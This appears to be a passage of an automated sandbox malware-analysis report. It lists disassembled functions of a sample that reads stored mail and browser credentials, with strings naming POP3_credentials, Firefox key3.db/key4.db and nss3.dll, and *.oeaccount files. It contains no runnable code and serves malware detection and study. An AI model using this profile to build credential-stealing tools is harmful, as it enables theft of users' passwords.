                                                                                                                                                                                                                                      • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                                                                                                                                                                      Function 0040A83A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                                        • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`-v,00000000,?,?,0040A7BE,00000001,0044CBC0,762D0A60), ref: 00406D4D
                                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040A921
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                                                                                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                                      • API String ID: 1631269929-4153097237
                                                                                                                                                                                                                                      • Opcode ID: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                                                                                                                                                                                                      • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                                                                                                                                                                      Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040810E
                                                                                                                                                                                                                                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,00000000,7693E430,?), ref: 004081B9
                                                                                                                                                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                                                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                                                                                                                                      • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                                                                                                      • API String ID: 524865279-2190619648
                                                                                                                                                                                                                                      • Opcode ID: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                                                                                                                                                      • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                                                                                                                                                      Function 00406B6D Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 86stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00406BFF
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00406C0D
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: strlen$_mbscat_mbscpymemset
                                                                                                                                                                                                                                      • String ID: key3.db$key4.db
                                                                                                                                                                                                                                      • API String ID: 581844971-3557030128
                                                                                                                                                                                                                                      • Opcode ID: 2f8350c5d3847b8345184316588304a55230d418217e1ade242334758e746451
                                                                                                                                                                                                                                      • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f8350c5d3847b8345184316588304a55230d418217e1ade242334758e746451
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                                                                                                                                                                                                                                      Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                                                                                                      • String ID: 0$6
                                                                                                                                                                                                                                      • API String ID: 2300387033-3849865405
                                                                                                                                                                                                                                      • Opcode ID: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                                                                                                                                                      • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                                                                                                                                                      Function 004076B7 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004076D7
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407710
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407733
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                                                                                      • String ID: %s (%s)
                                                                                                                                                                                                                                      • API String ID: 3756086014-1363028141
                                                                                                                                                                                                                                      • Opcode ID: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                                                                                                                                                                      • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                                                                                                                                                                      Function 00410863 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                                                                      • CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                                                                                                                                                                      • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                                                                      • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                                                                                                      • API String ID: 1640410171-3316789007
                                                                                                                                                                                                                                      • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                                                                                                                                                                      • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                                                                                                                                                                                      Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscat$memsetsprintf
                                                                                                                                                                                                                                      • String ID: %2.2X
                                                                                                                                                                                                                                      • API String ID: 125969286-791839006
                                                                                                                                                                                                                                      • Opcode ID: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                                                                                                                                                      • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                                                                                                                                                      Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                                                                                                                                                        • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                                                                                                                                                        • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                                                                        • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                                                                                                                                                        • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                                                                        • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                                                                        • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                                                                        • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                                                                                                      • String ID: ACD
                                                                                                                                                                                                                                      • API String ID: 1886237854-620537770
                                                                                                                                                                                                                                      • Opcode ID: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                                                                                                                                                      • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                                                                                                                                                      Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004091EC
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00409201
                                                                                                                                                                                                                                        • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                                                                                                                                                        • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                                                                                                        • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                                                                                                                                                      • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                                                                                                                                      • String ID: caption$dialog_%d
                                                                                                                                                                                                                                      • API String ID: 2923679083-4161923789
                                                                                                                                                                                                                                      • Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                                                                                                                                                      • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                                                                                                                                                      Function 00426918 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • no such savepoint: %s, xrefs: 00426A02
                                                                                                                                                                                                                                      • unknown error, xrefs: 004277B2
                                                                                                                                                                                                                                      • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                                                                                                                                                                      • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                                                                                                                                                                      • abort due to ROLLBACK, xrefs: 00428781
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                                                                                                                                                                      • API String ID: 3510742995-3035234601
                                                                                                                                                                                                                                      • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                                                                                                                                      • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                                                                                                                                                                                                      Function 0042B927 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                      • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                                                                      • API String ID: 2221118986-3608744896
                                                                                                                                                                                                                                      • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                                                                                                                                      • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                                                                                                                                                                                                      Function 004429A4 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 259COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                                                                                                                                                                                                        • Part of subcall function 0044257F: memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcmpmemcpy
                                                                                                                                                                                                                                      • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                                                                                                                                                      • API String ID: 1784268899-4153596280
                                                                                                                                                                                                                                      • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                                                                                                                                      • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                                                                                                                                                                                                                      Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410246
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410258
                                                                                                                                                                                                                                        • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041033F
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3974772901-0
                                                                                                                                                                                                                                      • Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
